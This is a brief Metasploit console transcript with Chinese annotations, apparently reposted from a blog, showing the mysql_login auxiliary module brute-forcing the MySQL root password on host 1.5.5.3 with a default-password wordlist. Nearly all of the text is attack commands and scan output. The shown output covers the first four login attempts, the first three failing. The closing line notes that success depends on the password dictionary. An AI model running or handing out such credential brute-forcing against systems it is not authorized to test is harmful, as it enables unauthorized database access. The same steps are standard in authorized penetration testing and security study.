msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml msf连接数据库
[*] Rebuilding the module cache in the background...
msf > db_status 查看数据库连接状态
[*] postgresql connected to msf3
msf > use auxiliary/scanner/mysql/mysql_login 加载扫描模块
msf auxiliary(mysql_login) > set RHOSTS 1.5.5.3 目标IP地址
RHOSTS => 1.5.5.3
msf auxiliary(mysql_login) > set USERNAME root 目标用户名 一般为root
USERNAME => root
msf auxiliary(mysql_login) > set
PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt 密码字典路劲,路劲随意填写
PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt
msf auxiliary(mysql_login) > exploit 开始扫描
[*] 1.5.5.3:3306 MYSQL – Found remote MySQL version 5.5.16
[*] 1.5.5.3:3306 MYSQL – [1/7] – Trying username:’root’ with password:”
[*] 1.5.5.3:3306 MYSQL – [1/7] – failed to login as ‘root’ with password ”
[*] 1.5.5.3:3306 MYSQL – [2/7] – Trying username:’root’ with password:’root’
[*] 1.5.5.3:3306 MYSQL – [2/7] – failed to login as ‘root’ with password ‘root’
[*] 1.5.5.3:3306 MYSQL – [3/7] – Trying username:’root’ with password:’tiger’
[*] 1.5.5.3:3306 MYSQL – [3/7] – failed to login as ‘root’ with password ‘tiger’
[*] 1.5.5.3:3306 MYSQL – [4/7] – Trying username:’root’ with password:’postgres’
能否扫描出来主要看密码字典
原文:http://sqlmap.blog.51cto.com/9333759/1547545